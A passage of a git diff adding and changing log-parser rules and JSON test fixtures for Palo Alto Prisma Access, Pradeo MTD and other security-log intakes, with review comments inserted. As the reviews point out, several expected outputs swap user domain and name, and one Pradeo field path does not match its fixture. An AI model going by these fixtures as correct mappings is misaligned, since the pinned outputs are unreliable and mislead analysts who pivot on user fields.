Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5"
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "nat": {
+ "ip": "4.3.2.1",
+ "port": 1042
+ },
+ "port": 58877,
+ "user": {
+ "domain": "example",
+ "name": "jdoe"
+ }
+ },
+ "tls": {
+ "curve": "secp256r1",
+ "server": {
+ "hash": {
+ "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b"
+ },
+ "x509": {
+ "issuer": {
+ "common_name": "GlobalSign ECC OV SSL CA 2018"
+ }
+ }
+ },
+ "version": "1.2"
+ },
+ "user": {
+ "domain": "jdoe",
+ "name": "example"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
index f08a677ef..70c31c202 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
@@ -21,6 +21,7 @@
 "type": "0"
 },
 "host": {
+ "id": "662f0b44-e024-4a70",
 "name": "2023-01724",
 "os": {
 "version": "Microsoft Windows 10 Enterprise , 64-bit"
@@ -49,7 +50,8 @@
 "1.2.3.4"
 ],
 "user": [
- "JDOE"
+ "JDOE",
+ "test.fr"
 ]
 },
 "source": {
@@ -64,8 +66,8 @@
 }
 },
 "user": {
- "domain": "test.fr",
- "name": "JDOE"
+ "domain": "JDOE",
+ "name": "test.fr"
 },
 "user_agent": {
 "os": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
new file mode 100644
index 000000000..140e7657e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
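Review bot: The top-level `user` object in this fixture has `domain` and `name` swapped: the input's SourceUser is `example\\jdoe` and `source.user` correctly yields `"domain": "example", "name": "jdoe"`, yet the expected `user` block is `"domain": "jdoe", "name": "example"`. The same inversion is pinned by the three test_globalprotect.json hunks and by test_userid.json (`"domain": "JDOE", "name": "test.fr"`, with the domain now listed under `related.user` instead of the account) and by test_hipmatch_json.json (`"domain": "jdoe", "name": "example.org"`); all of them look like one parser change assigning the captures to the wrong ECS fields, which is not part of this diff. These fixtures should assert `"domain": "example", "name": "jdoe"` here and keep `related.user` to account names only, since detection rules pivot on `user.name`. Secondarily, the input's ErrorMessage (`General TLS protocol error ...`) is not surfaced anywhere in the expected event; `error.message` would be its natural home.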
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..fd4e5a75f --- /dev/null 
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file 
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
index 25db7ff0a..c0622d09c 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
@@ -25,6 +25,7 @@
 "type": "globalprotect"
 },
 "host": {
+ "id": "e4f14dfd-bd3c-40e5-9c4e",
 "name": "LNL-test"
 },
 "log": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
index dee27d0e1..48cbcdca5 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
@@ -44,7 +44,7 @@
 "1.2.3.4"
 ],
 "user": [
- "JDOE"
+ "test.fr"
 ]
 },
 "source": {
@@ -53,8 +53,8 @@
 "port": 0
 },
 "user": {
- "domain": "test.fr",
- "name": "JDOE"
+ "domain": "JDOE",
+ "name": "test.fr"
 }
 }
 }
\ No newline at end of file
diff --git a/Pradeo/pradeo-mtd/ingest/parser.yml b/Pradeo/pradeo-mtd/ingest/parser.yml
index 239ce01d4..c10d3c444 100644
--- a/Pradeo/pradeo-mtd/ingest/parser.yml
+++ b/Pradeo/pradeo-mtd/ingest/parser.yml
@@ -176,16 +176,16 @@ stages:
 pradeo.device.mdmId: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.externalId}}"
 pradeo.device.emm: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.emm}}"
 pradeo.compliance.matchedResponseRules: "{{json_event.message.content.deviceApplication.compliance.matchedResponseRules}}"
- pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.application.id}}"
- pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.application.package.package}}"
- pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.application.package.system}}"
- pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.application.version}}"
- pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.application.versionCode}}"
- pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.application.name}}"
- pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.application.md5}}"
- pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.application.sha1}}"
- pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.application.sha256}}"
- pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}"
+ pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.id}}"
+ pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.package}}"
+ pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.system}}"
+ pradeo.application.version:
"{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.version}}"
+ pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.versionCode}}"
+ pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.name}}"
+ pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.md5}}"
+ pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha1}}"
+ pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha256}}"
+ pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.status}}"
 - filter: '{{json_event.message.type == "DeviceComplianceUpdated"}}'
 set:
 event.category: ["process"]
diff --git a/Pradeo/pradeo-mtd/tests/application_compliance_updated.json b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json
new file mode 100644
index 000000000..916f71473
--- /dev/null
+++ b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json
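Review bot: The new path for `pradeo.detection.status` (`deviceApplicationCompliance.deviceApplication.status`) does not exist in the payload this commit adds as a fixture: in application_compliance_updated.json `status` (`Disapproved`) sits directly under `deviceApplicationCompliance`, `deviceApplication` has no `status` key, and the expected output accordingly contains no `pradeo.detection.status` at all, so a field the old path produced is silently lost. Only that one line should be reverted: `pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}"`. The context line `pradeo.compliance.matchedResponseRules` has the same kind of mismatch (it reads `content.deviceApplication.compliance.matchedResponseRules` while the fixture carries `content.deviceApplicationCompliance.matchedResponseRules`, and the expected output has no `pradeo.compliance`), which is pre-existing but worth fixing in the same pass since the compliance verdict and the matched rule are what an analyst pivots on. The enclosing `set:` stage starts before this hunk.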
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n 
\"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "sekoiaio": { + "intake": { + "dialect": "Pradeo MTD", + "dialect_uuid": "3cedbe29-02f8-42bf-9ec2-0158186c2827" + } + } + }, + "expected": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n 
\"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "event": { + "action": "DeviceApplicationComplianceUpdated", + "category": [ + "process" + ], + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-27T04:10:33.460000Z", + "pradeo": { + "application": { + "id": "azertyuiop", + "md5": "0fccfdefc882c4be6d2a938001184e08", + "name": "App", + "package": "com.app.test", + "sha1": "749c94cd972726ef2b3ccda7e718a2034cc9f6ac", + "sha256": "278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8", + "system": "Android", + "version": "491.0.0.58.78", + "versionCode": "457215664" + }, + "device": { + "byod": false, + "coupled": true, + "declaredModel": "MODEL 01", + "declaredOperatingSystem": "Android", + "declaredOperatingSystemSecurityPatchDate": "2020-09-01T00:00:00Z", + "declaredOperatingSystemVersion": "10.0.0", + "id": "device_id01", + "lastConnection": "2024-11-27T04:07:32Z", + "name": "John", + "serialNumber": "unknown" + }, + "metadata": { + "creationDate": "2024-11-27T04:10:33.460000Z", + "id": "1234567890", + "source": "system", + "type": 
"DeviceApplicationComplianceUpdated"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml
index c70fee596..451c6f163 100644
--- a/RSA/rsa-securid/ingest/parser.yml
+++ b/RSA/rsa-securid/ingest/parser.yml
@@ -4,6 +4,7 @@ pipeline:
 external:
 name: dsv.parse-dsv
 properties:
+ raise_errors: false
 input_field: original.message
 output_field: message
 columnnames:
diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml
index 6bd68803a..f55fa8ea7 100644
--- a/Retarus/retarus_email_security/ingest/parser.yml
+++ b/Retarus/retarus_email_security/ingest/parser.yml
@@ -7,6 +7,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: json_event.message.sender
 output_field: sender
 pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$"
@@ -15,6 +16,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: json_event.message.recipient
 output_field: recipient
 pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$"
diff --git a/Salesforce/salesforce-events/_meta/fields.yml b/Salesforce/salesforce-events/_meta/fields.yml
index ec92923ea..29be61136 100644
--- a/Salesforce/salesforce-events/_meta/fields.yml
+++ b/Salesforce/salesforce-events/_meta/fields.yml
@@ -117,3 +117,8 @@ salesforce.user.type:
 description: Salesforce user type
 name: salesforce.user.type
 type: keyword
+
+salesforce.user_agent:
+ description: Salesforce user agent
+ name: salesforce.user_agent
+ type: number
diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml
index 7a3452fa9..54db25d6c 100644
--- a/Salesforce/salesforce-events/ingest/parser.yml
